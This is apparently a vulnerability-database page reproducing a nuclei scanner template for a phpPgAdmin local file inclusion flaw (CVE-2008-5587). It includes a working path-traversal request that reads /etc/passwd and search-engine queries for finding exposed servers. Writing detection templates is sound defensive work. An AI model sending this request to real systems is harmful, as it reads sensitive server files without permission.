Lucene search
K

phpPgAdmin <=4.2.1 - Local File Inclusion

🗓️ 14 Jun 2026 03:03:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 48 Views

phpPgAdmin 4.2.1 Local File Inclusion vulnerabilit

Related
Refs
Code
id: CVE-2008-5587

info:
  name: phpPgAdmin <=4.2.1 - Local File Inclusion
  author: dhiyaneshDK
  severity: medium
  description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.
  remediation: |
    Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/7363
    - https://nvd.nist.gov/vuln/detail/CVE-2008-5587
    - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
    - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html
    - http://securityreason.com/securityalert/4737
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2008-5587
    cwe-id: CWE-22
    epss-score: 0.02153
    epss-percentile: 0.84691
    cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phppgadmin
    product: phppgadmin
    shodan-query:
      - http.title:"phpPgAdmin"
      - http.title:phppgadmin
      - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin"
    fofa-query: title=phppgadmin
    google-query: intitle:phppgadmin
  tags: cve,cve2008,lfi,phppgadmin,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220793181f5cfb49e882ab6961b889fbd7a19e29810ebfe904998cf14c051bd940602207392f38169adf43762c70c6470f06191707c4dc4c29cd621697220f673d3f377:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 24.3
EPSS0.02153
48